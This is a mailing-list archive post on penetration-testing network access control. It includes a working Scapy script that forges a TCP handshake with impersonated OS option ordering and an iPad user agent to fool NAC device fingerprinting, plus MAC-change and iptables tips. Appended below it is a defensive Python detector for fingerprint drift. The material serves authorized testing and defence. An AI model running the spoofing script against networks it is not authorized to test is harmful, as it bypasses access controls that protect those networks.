PaulDotCom mailing list archives
Re: spoofing another machine's fingerprints
From: Joshua Wright <jwright () hasborg com>
Date: Fri, 30 Aug 2013 10:18:29 -0400
As I asked about recently, I'll soon be testing a NAC type device and so I was wondering, is there a tool which will let me watch a device then clone its network fingerprint? By fingerprint I mean things like network settings such as TTLs but also open ports (probably couldn't spoof the service but at least open the port). I know there is a tool that is designed to fool attackers by having a list of different OSes and you choose which you want to pretend to be, but rather than pick from a list I want to be able to point it at another machine and say "clone that".

What do you do for IP? Do you work out what is on the network through passive observation and then pick something that looks appropriate? Any other suggestions on testing/avoiding NAC? I've not tested with one in action before and don't have anything to practice against. This particular test is to see if it is doing its job properly, so specifics on testing a NAC would be good.
When I'm testing a NAC system I connect with a standard Windows or OS X client first, and explore what's accessible, trying to identify the NAC vendor. From there I'll do some passive analysis, and try to determine if there are any exception policies applied (such as a rule for iPads not having to authenticate, etc.). NAC vendors commonly perform OS fingerprinting to identify devices, and products like Cisco ISE use the fingerprints to apply rules to devices. They can't continually fingerprint the devices though, so they perform an initial analysis, and then subsequent analysis per the NAC configuration (IIRC, Cisco ISE's re-check interval has a minimum delay of 15 minutes, with a default of "check once").

I'll typically change my MAC to get another IP, and use Scapy to complete a 3-way handshake to any accessible host, just to trick the OS fingerprinting rule (Cisco ISE checks TCP option parameters including order of options, which is hard to spoof on Linux, and impossible on Windows, but Scapy does it just fine). Here is a sample script I have lying around:

    #!/usr/bin/python
    import sys
    from scapy.all import *

    DSTIP = "10.10.10.110"  # Specify your target where NAC will observe it

    # Fix the source port once: a bare RandNum is re-rolled every time a
    # packet is built from it, which would give the SYN, ACK, PUSH and RST
    # different source ports and break the handshake.
    SPORT = int(RandNum(1024, 65535))

    ip = IP(dst=DSTIP, flags="DF", ttl=64)

    # TCP options in the exact order the impersonated stack emits them
    tcpopt = [
        ("MSS", 1460),
        ("NOP", None),
        ("WScale", 2),
        ("NOP", None),
        ("NOP", None),
        ("Timestamp", (123, 0)),
        ("SAckOK", ""),
        ("EOL", None),
    ]

    SYN = TCP(sport=SPORT, dport=80, flags="S", seq=10, window=0xffff, options=tcpopt)
    SYNACK = sr1(ip/SYN)  # Send the packet and record the response as SYNACK
    if SYNACK is None or not SYNACK.haslayer(TCP):
        sys.exit("no SYN/ACK received from %s" % DSTIP)
    my_ack = SYNACK[TCP].seq + 1  # Use the SYN/ACK response to get the initial seq. number

    ACK = TCP(sport=SPORT, dport=80, flags="A", seq=11, ack=my_ack, window=0xffff)
    send(ip/ACK)

    data = ("GET / HTTP/1.1\r\nHost: " + DSTIP +
            "\r\nUser-Agent: Mozilla/5.0 (iPad; CPU OS 5_0 like Mac OS X) "
            "AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 [...]\r\n\r\n")
    PUSH = TCP(sport=SPORT, dport=80, flags="PA", seq=11, ack=my_ack, window=0xffff)
    send(ip/PUSH/data)

    # Tear the connection down so the target does not keep a half-open socket
    RST = TCP(sport=SPORT, dport=80, flags="R", seq=11, ack=0, window=0xffff)
    send(ip/RST)

Before you use this script, make sure you apply an iptables rule to stop the Linux native stack from sending a TCP RST to the spoofed TCP SYN. After I get some of this traffic through, I do some more testing to see what my connectivity looks like with netcat or manual Scapy connections.

HTH,
-Josh

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
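The weakness Josh describes is that a "check once" profiler trusts an address after its first SYN, so any later traffic from that address with a different stack signature goes unnoticed. The script below is an added example written for this archive page; it is not code from the thread, from Scapy or from any NAC product. It re-derives the SYN signature (TTL, DF, window, TCP option order, MSS, window scale) from every packet and flags a source whose signature changes, which is the check a once-only profiler lacks. The IPv4/TCP packets it parses are constructed inline as test fixtures (no Scapy dependency, checksums left zero); the two option layouts, the addresses and the choice to key on source IP are assumptions.

```python
"""Passive TCP SYN fingerprinting with drift detection (added example)."""
import struct
from collections import defaultdict

# TCP option kinds (RFC 793 / 7323 / 2018); unknown kinds are reported by number.
TCP_OPTION_NAMES = {0: "EOL", 1: "NOP", 2: "MSS", 3: "WScale", 4: "SAckOK", 8: "Timestamp"}


def parse_tcp_options(raw):
    """Return the option kinds in wire order plus the MSS / window-scale values."""
    kinds, values, i = [], {}, 0
    while i < len(raw):
        kind = raw[i]
        name = TCP_OPTION_NAMES.get(kind, str(kind))
        if kind == 0:                      # EOL terminates the list; rest is padding
            kinds.append(name)
            break
        if kind == 1:                      # NOP has no length byte
            kinds.append(name)
            i += 1
            continue
        if i + 1 >= len(raw):
            raise ValueError("truncated TCP option")
        length = raw[i + 1]
        if length < 2 or i + length > len(raw):
            raise ValueError("bad TCP option length")
        body = raw[i + 2:i + length]
        if kind == 2 and len(body) == 2:
            values["mss"] = struct.unpack("!H", body)[0]
        elif kind == 3 and len(body) == 1:
            values["wscale"] = body[0]
        kinds.append(name)
        i += length
    return kinds, values


def fingerprint(packet):
    """Extract the stack-dependent fields of an IPv4/TCP SYN.

    Returns (ttl, df, window, option order, mss, wscale), or None when the
    packet is not a bare SYN (so SYN/ACKs and data segments are ignored).
    """
    if len(packet) < 20:
        raise ValueError("short IPv4 header")
    ihl = (packet[0] & 0x0F) * 4
    ttl = packet[8]
    df = bool(struct.unpack("!H", packet[6:8])[0] & 0x4000)
    if packet[9] != 6 or len(packet) < ihl + 20:   # protocol 6 = TCP
        return None
    tcp = packet[ihl:]
    data_off = (tcp[12] >> 4) * 4
    if (tcp[13] & 0x3F) != 0x02:                   # SYN set, nothing else
        return None
    window = struct.unpack("!H", tcp[14:16])[0]
    kinds, values = parse_tcp_options(tcp[20:data_off])
    return (ttl, df, window, tuple(kinds), values.get("mss"), values.get("wscale"))


def detect_drift(observations):
    """observations: iterable of (src_ip, packet_bytes), in arrival order.

    Returns {src_ip: [distinct fingerprints]} for every source whose SYN
    signature changed, i.e. what continuous re-profiling would catch.
    """
    seen = defaultdict(list)
    for src, pkt in observations:
        fp = fingerprint(pkt)
        if fp is not None and fp not in seen[src]:
            seen[src].append(fp)
    return {src: fps for src, fps in seen.items() if len(fps) > 1}


# --- constructed sample input (test fixtures, not captured traffic) -----------
def _syn(ttl, df, window, options):
    """Build a minimal IPv4/TCP SYN for the demo; checksums are left zero."""
    opts = options + b"\x00" * (-len(options) % 4)    # pad options to 32-bit words
    data_off = (20 + len(opts)) // 4
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 10, 0, data_off << 4, 0x02, window, 0, 0) + opts
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000 if df else 0,
                     ttl, 6, 0, bytes([10, 10, 10, 50]), bytes([10, 10, 10, 110]))
    return ip + tcp


# Option layout A: MSS, NOP, WScale, NOP, NOP, Timestamp, SAckOK, EOL (assumed stack 1)
OPTS_A = (b"\x02\x04\x05\xb4"              # MSS 1460
          + b"\x01"                         # NOP
          + b"\x03\x03\x02"                 # WScale 2
          + b"\x01\x01"                     # NOP, NOP
          + b"\x08\x0a" + b"\x00" * 8       # Timestamp (TSval/TSecr zeroed)
          + b"\x04\x02"                     # SAckOK
          + b"\x00")                        # EOL
# Option layout B: MSS, SAckOK, Timestamp, NOP, WScale (assumed stack 2)
OPTS_B = (b"\x02\x04\x05\xb4" + b"\x04\x02" + b"\x08\x0a" + b"\x00" * 8
          + b"\x01" + b"\x03\x03\x07")

SAMPLE = [
    ("10.10.10.50", _syn(64, True, 0xFFFF, OPTS_A)),
    ("10.10.10.50", _syn(64, True, 0xFFFF, OPTS_A)),   # same stack again: no drift
    ("10.10.10.50", _syn(128, True, 8192, OPTS_B)),    # same address, different stack
    ("10.10.10.51", _syn(64, True, 0xFFFF, OPTS_A)),   # consistent host
]

if __name__ == "__main__":
    for src, fps in detect_drift(SAMPLE).items():
        print(src, "SYN fingerprint changed:", fps)
```

Keying on the source IP mirrors what a NAC sees after the MAC swap Josh mentions; a deployment that keeps the MAC-to-IP binding would key on the MAC instead, and the same drift check applies. Option order is compared as an ordered tuple on purpose, since that ordering is the field Josh notes ISE relies on.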